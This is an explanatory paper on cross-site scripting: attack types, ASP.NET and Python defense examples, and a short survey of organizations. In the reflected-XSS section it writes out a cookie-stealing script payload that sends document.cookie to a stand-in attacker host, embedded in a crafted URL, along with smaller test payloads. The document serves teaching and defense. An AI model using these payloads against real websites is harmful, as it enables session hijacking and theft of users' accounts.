Cross-Site Scripting Analysis

1. Introduction to Cross-Site Scripting

Hackers use a number of techniques to compromise web applications. These techniques can give them direct access to sensitive information, such as credit card numbers, social security numbers, or medical records. Cross-site scripting (XSS) is generally considered one of the techniques used in application-layer attacks. It has therefore become necessary for website developers to build reliable web applications that deliver a range of outputs to many users according to each user's preferences and requirements. In this way, an organization can provide high-quality, secure information to its customers and prospects (Cross & Palmer, 2007). Despite this, websites have been found to contain large numbers of vulnerabilities that leave organizations unable to control cross-site scripting attacks against their data.

A web page contains both text and HTML markup that are generated by the server and interpreted by the client's browser. Only websites that serve static information and images have full control over the output of their pages. Sites that generate dynamic pages do not have full control over how their output is interpreted by the client (Grossman, Fogie & Hansen, 2007). The main point is that if untrusted data has been incorporated into a dynamic page, neither the website nor the client has enough evidence to recognize that this has happened and to take the necessary measures.

By using cross-site scripting, a malicious user can inject JavaScript, active HTML, or Flash into a vulnerable system. The victim is then tricked into activating the script on his own device, allowing the attacker to collect information. A successful XSS attack can result in compromised data, manipulated or stolen cookies, forged requests that are mistaken for those of a valid user, and the execution of malicious code on the client's system. The malicious content is most often delivered through a hyperlink, the easiest transfer mechanism on the Internet.
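The injection mechanism described above can be sketched in a short example. Python is used here purely as a language-neutral illustration; the `render_greeting` function and its payload are hypothetical:

```python
import html

def render_greeting(name: str, escape: bool = True) -> str:
    """Build a page fragment from user-supplied input.

    With escape=False the input is interpolated verbatim, so a payload
    such as <script>...</script> becomes live markup -- the core XSS flaw.
    """
    safe_name = html.escape(name) if escape else name
    return f"<html><body><p>Hello, {safe_name}!</p></body></html>"

payload = "<script>alert('XSS')</script>"

# Vulnerable rendering: the script tag survives intact and would execute.
print(render_greeting(payload, escape=False))

# Safe rendering: angle brackets become &lt; and &gt;, leaving inert text.
print(render_greeting(payload))
```

The only difference between the two calls is whether the output is encoded; the browser, not the server, is what turns the unencoded string into running code.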

When using XSS as an attack tool, the attacker can craft and distribute a customized XSS URL, using a browser to assess the potential response of the website (Cross & Palmer, 2007). The malicious user also needs a working knowledge of HTML, JavaScript, and dynamic content to produce a URL that does not look too suspicious when used to attack a vulnerable website.

The websites most vulnerable to such attacks are those that pass parameters to databases, which is most common in login forms and password recovery forms (Grossman, Fogie & Hansen, 2007).

A typical XSS attack proceeds as follows: the hacker infects a legitimate web page with a malicious script, which is downloaded through the browser when the client visits the page and is then executed. Small variations occur between attack patterns, but the sequence is largely the same: the hacker infects the web page with the script, the victim visits the page, and when the victim opens it, the script performs something harmful that the web application owner never intended.

Usually, web developers take precautions to protect the application from the first step of the attack: preventing the hacker from infecting the web page in the first place. A number of ways are available to accomplish this. This paper explains some techniques that web developers may find useful in protecting their pages from attack. It also covers the types of threats that web pages are likely to face during operation (Grossman, Fogie & Hansen, 2007). The paper further reports research into how some organizations and web developers prevent their websites from being attacked through XSS, presents the findings of that research, and offers recommendations on the best practices developers can use to prevent such attacks. The literature review explains some methods that have previously been used to prevent attacks on websites and how they have been applied successfully.

2. Literature Review

JavaScript is popular in the development of rich web applications. The dynamic nature of web applications such as Google Maps and Yahoo is made possible by the client-side execution of code embedded in HTML pages. Making a system more complex introduces potential security threats, and connecting JavaScript to a web page is no exception. Several problems can be caused by the use of JavaScript on a web page. One difficulty is that a malicious website may use JavaScript to modify the local system by deleting or copying information. In addition, a malicious website may use JavaScript to track activity on the system, for instance through keystroke logging. Furthermore, it may use JavaScript to communicate with other websites that the user currently has open in other tabs or windows (Cross & Palmer, 2007).

The problems above can be mitigated in a number of ways. For instance, scripts that attempt to change the local system can be contained by making the browser act as a sandbox that grants JavaScript only a few privileges, restricting it to operate within the browser's own domain. The problem of interaction with other websites can only be reduced, not eliminated, since a web page's interaction with another page is not something the end client's software can fully limit. In addition, the ability of one site's JavaScript to obtain data intended for another site depends largely on the carefulness of the website developer.

The defining characteristic of cross-site scripting is that the capabilities of a particular site's dynamic components give attackers the chance to apply JavaScript against its security. The name 'cross-site' reflects the fact that the attack uses an association between a number of websites to accomplish its objectives. Notably, the site under threat of a cross-site scripting exploit does not itself need to use JavaScript.

2.1 Cross-Site Scripting Vulnerabilities

There are three main types of cross-site scripting. Research has been conducted into the existence of other types of XSS, but the discussion of web page vulnerabilities here is concerned only with these three. Other serious vulnerabilities may exist that have not yet been discovered, and they are becoming increasingly worrying to web application owners and web developers.

There are the following forms of cross-site scripting:

  • Reflected

This is generally considered the most frequent form of cross-site scripting. It exploits vulnerabilities in websites that take data submitted by clients and immediately return it, in some form, to the web browser on the user's system. An attack is successful if it can send code to the server as part of a request and have the server return that code in the response rendered by the browser. The vulnerability arises when the returned data is not encoded using HTML special-character encoding; as a result, the web browser executes it instead of displaying it as inert visible text (Grossman, Fogie & Hansen, 2007).

This exploit can be used by crafting a link with a malformed URL, so that a variable passed in the URL carries malicious code to the page. The vulnerable code can be as simple as server-side code that uses a URL parameter to generate links on the page, or user account information that is incorporated into the page text so that the display is determined by the supplied name.
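The shape of such a crafted URL can be sketched as follows. The endpoint `https://example.com/search` and the attacker host `evil.example` are hypothetical placeholders; the point is that percent-encoding makes the link look ordinary while the server decodes it back into live markup:

```python
from urllib.parse import quote, urlencode, parse_qs, urlparse

# Hypothetical vulnerable endpoint that echoes its "q" parameter into the page.
BASE = "https://example.com/search"

# Classic cookie-stealing payload, shown here only as a string.
payload = ("<script>document.location="
           "'https://evil.example/?c='+document.cookie</script>")

# Percent-encode the payload into an innocuous-looking query string.
malicious_url = BASE + "?" + urlencode({"q": payload})
print(malicious_url)

# A server that decodes the parameter recovers the raw script verbatim.
decoded = parse_qs(urlparse(malicious_url).query)["q"][0]
assert decoded == payload
```

A victim who follows such a link sees only the trusted domain in the address bar, which is why reflected XSS is usually delivered through links in e-mail or on other sites.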

  • Stored

Also known as HTML injection attacks, these are persistent cross-site scripting exploits in which some information sent to the server is stored, typically in a database, and later used to build fresh pages served to other clients of the web application. This form of cross-site scripting can affect anyone visiting a site that is subject to a stored cross-site scripting vulnerability. A typical illustration of this kind of vulnerability is a content management system, such as a bulletin-board forum, that allows raw XHTML and HTML to be used when editing content (Grossman, Fogie & Hansen, 2007).

Just as with reflected exploits, a website can be successfully secured from stored exploits by ensuring that virtually all submitted information is transformed into a display-safe form before it is shown. This prevents an interpreter from treating it as code.
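The encode-on-output strategy described above can be sketched with a minimal in-memory "database" of comments (the storage and the function names are assumptions for illustration):

```python
import html

# Minimal stand-in for persistent storage: comments are stored verbatim.
comments: list[str] = []

def post_comment(text: str) -> None:
    comments.append(text)  # stored exactly as submitted

def render_comments() -> str:
    # Encoding happens at display time, so every read path is protected
    # regardless of what was stored.
    items = "".join(f"<li>{html.escape(c)}</li>" for c in comments)
    return f"<ul>{items}</ul>"

post_comment("Nice article!")
post_comment("<img src=x onerror=alert(1)>")  # a typical stored payload
print(render_comments())
```

Encoding at output rather than at input also means previously stored malicious records are neutralized without any database cleanup.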

  • Local

This type of cross-site scripting attacks vulnerabilities in the code of a web page itself. Such vulnerabilities are caused by incautious use of the Document Object Model in JavaScript, so that opening another web page containing malicious JavaScript can alter the code of the initial page on the local system. Older versions of Internet Explorer treated local web application pages stored on the computer, rather than downloaded from the Internet, with elevated trust (Cross & Palmer, 2007). Through these local pages, a script can break out of the browser 'sandbox', affect the entire system, and run with the privileges of the current user.

Because Microsoft Windows software traditionally ran all programs under an administrator account, this meant in practice that this form of cross-site scripting could damage the whole of MS Windows; mitigation measures were only introduced with XP Service Pack 2.

Unlike reflected or stored exploits, a local cross-site scripting exploit sends no malicious code to the server. The entire exploit takes place on the client system: it changes pages delivered by an otherwise well-secured website before the browser interprets them, so that they behave as if the server had delivered a page carrying a malicious payload. The implication is that server-side security measures that filter and block malicious input cannot prevent this class of exploit.

2.2 Methods of Preventing Cross-Site Scripting

Cross-site scripting attacks a vulnerability in a web application by inserting script from the client into the application's output. The script code embeds itself in response data that is transferred back to the user, and the browser used by the client then executes it. Because of the trustworthiness of the channel from which the script was downloaded, the browser has no way to recognize the code as illegitimate; the Microsoft Internet Explorer security zones, for example, offer no defense here. The most serious consequences of cross-site scripting occur when the attacker writes a script that obtains an authentication cookie granting access to a valid site, and then posts that cookie to the attacker's own web address (Cross & Palmer, 2007). The attacker is thereby able to impersonate the user's identity and gain easy access to the trusted site. A web application is likely to be vulnerable to cross-site scripting when it fails to constrain and validate input, fails to encode output, or trusts information obtained from a shared data store.

Certain guidelines are followed to defend against cross-site scripting: constraining the input and encoding the output. When constraining input, start from the assumption that the input is malicious, then validate its length, type, range, and format. Input supplied through server controls can be constrained using ASP.NET validator controls such as RangeValidator. Input supplied through client-side HTML input controls, or from sources such as query strings and cookies, can be checked on the server with the System.Text.RegularExpressions classes to detect expected script-based attacks. When encoding output, use the HttpUtility class. The following steps are involved in preventing cross-site scripting attacks. The first step is to ensure that ASP.NET request validation is enabled. Request validation is usually enabled at the machine level; verify that it is currently enabled in the server's machine configuration file and that the application does not override it. Request validation can also be disabled on a per-page basis (Cross & Palmer, 2007), and you should not disable this feature in your pages without reason. A legitimate reason to disable it is a free-format text entry field designed to accept HTML as its main form of input. To observe the effect, create an ASP.NET page with request validation disabled (Grossman, Fogie & Hansen, 2007), run it, and note that the input is rendered and passed through as client-side script; then set the validation request attribute back to 'true' or remove it from the page attributes, and browse the page again.
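The "constrain the input" guideline, which the text illustrates with ASP.NET's regular-expression classes, amounts to reject-by-default whitelist validation. A minimal language-neutral sketch in Python (the username field and its format are assumptions chosen for illustration):

```python
import re

# Whitelist pattern for a hypothetical username field:
# letters, digits, and underscores, 3 to 20 characters.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,20}")

def validate_username(value: str) -> bool:
    """Reject-by-default constraint: only input of the expected
    length, type, and format is accepted; everything else fails."""
    return bool(USERNAME_RE.fullmatch(value))

assert validate_username("alice_99")
assert not validate_username("<script>alert(1)</script>")  # markup rejected
assert not validate_username("ab")                         # too short
```

The key design choice is validating against what is allowed rather than trying to enumerate what is dangerous, since deny-lists are easy to bypass with encoding tricks.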

The next step is to determine the many ways in which the ASP.NET code writes HTML output, searching the pages to locate where URL and HTML output is returned to the client.

It is also necessary to determine whether the HTML output includes input parameters. The design and the pages are analyzed to find whether the output contains any input parameters, which can come from a range of sources, including form fields, databases, query strings, and data-access code. The source-code analysis can be reinforced by simple tests, such as writing a marker string like 'XYZ' into form fields and examining the output. If the browser displays 'XYZ' unaltered when the HTML source is viewed, it can be concluded that the web application is susceptible to cross-site scripting.
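The probe test described above can be sketched as a small harness. The `echo_page` function is a hypothetical stand-in for a server page that reflects a query-string parameter; a probe containing markup characters makes the result easier to judge than plain 'XYZ':

```python
import html

def echo_page(query: str, encode_output: bool) -> str:
    # Stand-in for a server page that reflects a request parameter.
    body = html.escape(query) if encode_output else query
    return f"<p>You searched for: {body}</p>"

# Harmless marker wrapped in markup characters, in the spirit of the
# 'XYZ' test: if the tags come back intact, raw input is reflected.
PROBE = "<b>XYZ</b>"

def looks_vulnerable(page: str) -> bool:
    return PROBE in page

assert looks_vulnerable(echo_page(PROBE, encode_output=False))
assert not looks_vulnerable(echo_page(PROBE, encode_output=True))
```

A benign probe like this confirms reflection without running any actual attack payload against the application.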

The next step is to review any unsafe HTML tags and attributes. If tag attributes are created from untrusted input, it must be ensured that the attributes are HTML-encoded before they are written out. While many HTML tags exist, those that a malicious client can abuse include applet, body, frame, embed, html, style, layer, and object (Grossman, Fogie & Hansen, 2007). Malicious users often use HTML attributes such as 'style' in connection with these tags to trigger cross-site scripting.

The next step is the evaluation of countermeasures, which begins whenever ASP.NET code is found generating HTML from user input. The right combination of countermeasures must be determined for the particular application; they include encoding URL output, encoding HTML output, and filtering user input.

A number of additional safeguards exist beyond the techniques mentioned above for eliminating cross-site scripting. They include setting the correct character encoding, not relying on input processing alone, and using the InnerText property rather than InnerHtml.

Setting the correct character encoding successfully restricts the data a web page accepts by limiting the ways in which input can be represented. This prevents malicious users from using multi-byte escape sequences and canonicalization tricks that defeat input validation. A multi-byte escape sequence manipulates character encodings, such as Unicode transformation formats, which use sequences of several bytes to represent characters outside the ASCII range. An exploitable security hole may be created when some UTF decoders accept illegitimate byte sequences (Grossman, Fogie & Hansen, 2007). In ASP.NET, you can specify the character set at the application or page level by using the 'globalization' element in the Web.config file.
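The 'globalization' element mentioned above might be configured as in the following fragment. This is a hedged sketch of a Web.config excerpt, not a complete configuration file; attribute values should be adjusted to the application's requirements:

```xml
<!-- Hypothetical ASP.NET Web.config fragment: pinning request and
     response encodings so multi-byte escape tricks cannot slip past
     input validation under an unexpected character set. -->
<configuration>
  <system.web>
    <globalization requestEncoding="utf-8" responseEncoding="utf-8" />
  </system.web>
</configuration>
```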

3. Research Methodology

3.1 Participants in the Research

The research involved collecting information about web application problems caused by cross-site scripting from a number of companies that own websites. The people involved were a research sponsor, a steering committee, end-user representatives, a project manager, and professionals in the field of cross-site scripting. The sponsor ensured that the project was well funded and met its financial obligations while the research was conducted, and that the required facilities for conducting the research were available. The steering committee, drawing on its familiarity with conditions in these organizations, provided guidance on assigning responsibilities such as conducting interviews, and oversaw the allocation and expenditure of funds. End-user representatives included website clients, such as customers of these companies, who told the research team about problems they had encountered as a result of cross-site scripting. The project manager ensured that the research was carried out with the aim of establishing the effects of cross-site scripting on the performance of web applications, and made the specialized arrangements for assembling the facilities used during the research. The role of the professionals in the field of cross-site scripting was to explain difficult problems concerning attacks on web applications by malicious users to the research team, and to interpret the answers provided by end users.

3.2 Methods of Data Collection

One of the methods used for data collection was an interview, in which website administrators in the sample companies were asked whether their websites had ever been attacked by malicious web users. They were also asked to give examples of ways in which they had responded to these problems, and then to explain how web hacking had affected the reputation of their companies.

In another part of the research, a survey was conducted among the sample companies, in which web administrators were required to fill in questionnaires containing questions about the seriousness of malicious web use in their organizations. The questions were open-ended, and respondents were free to answer as they wished.

The results of the research were then analysed by determining the frequency of the occurrence of cross-site scripting, and methods that were mainly used to correct these web hacking processes.

The results of the research were used to provide recommendations on the way, in which website owners should tackle the issue of cross-site scripting in order to maintain the secrecy and reputation of their companies.


4. Research Findings

4.1 Various Problems Caused by Cross-Site Scripting

It was found that the effects of cross-site scripting occur with varying frequency. Based on sampling tests carried out in the surveyed organizations, the following table shows how often the various effects of scripting occurred.

Compromise of data integrity              40%

Theft or manipulation of cookies        30%

Interception of user input                    20%

Execution of malicious scripts               10%

4.2 The Most Popular Methods Used by Organizations to Control Website Scripting

Most organizations interviewed reported that they prevented website scripting by encoding output derived from input parameters containing significant metacharacters. The experts explained that this approach is effective when dealing with information that was not validated as it was fed into the system. A malicious script can be prevented from executing by using techniques such as URL encoding and HTML encoding.

Another popular method of preventing malicious web attacks is filtering input parameters for specific characters. The experts explained that this is achieved by removing all or some of the input characters that are significant in generating a script in the HTML stream, such as <, >, %, (, and &.
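The character-filtering approach reported by the surveyed organizations can be sketched as a simple deny-list over exactly the characters named above (an assumption for illustration; as the earlier sections note, filtering complements but does not replace output encoding):

```python
# Deny-list of the characters the organizations reported stripping
# from input before it reaches the HTML stream.
DANGEROUS = set("<>%(&")

def filter_input(value: str) -> str:
    """Remove every character significant for script generation."""
    return "".join(ch for ch in value if ch not in DANGEROUS)

# The filtered string can no longer form a script tag.
print(filter_input("<script>alert(100%)</script>"))  # scriptalert100)/script
```

The weakness of this design is visible in the output: the payload is defanged but mangled, and any deny-list risks missing an encoding the attacker can still exploit, which is why encoding on output remains the primary defense.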

5. Conclusions and Recommendations

A web application vendor is advised to develop a culture of never trusting user input and to ensure that metacharacters are filtered. An XSS hole, if not eliminated, can have disastrous consequences for a business. Malicious users often disclose such holes publicly, which can erode public confidence in the privacy and security of an organization's site.

Users also need to protect themselves by being careful about which links they follow to the websites they intend to view. For instance, instead of reaching BBC content through another site's search engine, a user should log on to the BBC through its main site. This alone may prevent a large percentage of the problem. Occasionally, XSS executes automatically when an e-mail or a bulletin-board post is opened, so those who read e-mail or public boards on unfamiliar websites should be careful. The surest way of protecting oneself is to turn off JavaScript in the browser settings (Grossman, Fogie & Hansen, 2007). There have been a number of widely publicized cases of cross-site scripting being found on websites. If cross-site scripts are not guarded against, a malicious attacker may find a way into the company's website and publish a warning about the company. As a result, the company's reputation may be compromised by being viewed as insensitive to security issues (Cross & Palmer, 2007), sending clients the message that the company is not serious about such matters. This becomes a trust issue: clients who lack trust in you will be reluctant to do business with you.
